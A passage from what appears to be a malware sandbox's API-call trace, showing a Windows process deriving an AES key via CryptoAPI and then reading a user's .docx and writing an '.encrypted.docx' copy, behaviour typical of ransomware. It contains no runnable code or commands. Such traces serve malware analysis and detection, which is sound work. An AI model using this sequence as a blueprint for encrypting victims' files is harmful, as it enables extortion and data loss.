lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.983] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.983] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0036.984] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.984] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.984] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.984] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.984] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.984] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.985] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0036.985] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.985] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.985] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.986] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdf0 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.986] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.986] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.986] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.986] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.987] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.987] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.987] CryptHashData (hHash=0x7c2240, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0036.987] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.987] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.987] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.987] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.988] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.988] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.988] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.988] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.988] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0036.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.988] CryptDestroyHash (hHash=0x7c2240) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.988] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.988] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0036.988] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zldtrs1nh.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.989] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.989] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.989] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.989] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0036.989] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.989] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zldtrs1nh.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.989] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.989] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.989] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.990] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.990] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.990] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0036.992] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x550b, lpOverlapped=0x0) returned 1 [0036.992] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.994] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.994] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.995] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.995] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0036.995] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.995] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.995] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.995] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0036.995] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.995] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da208, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da208*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.995] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.996] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 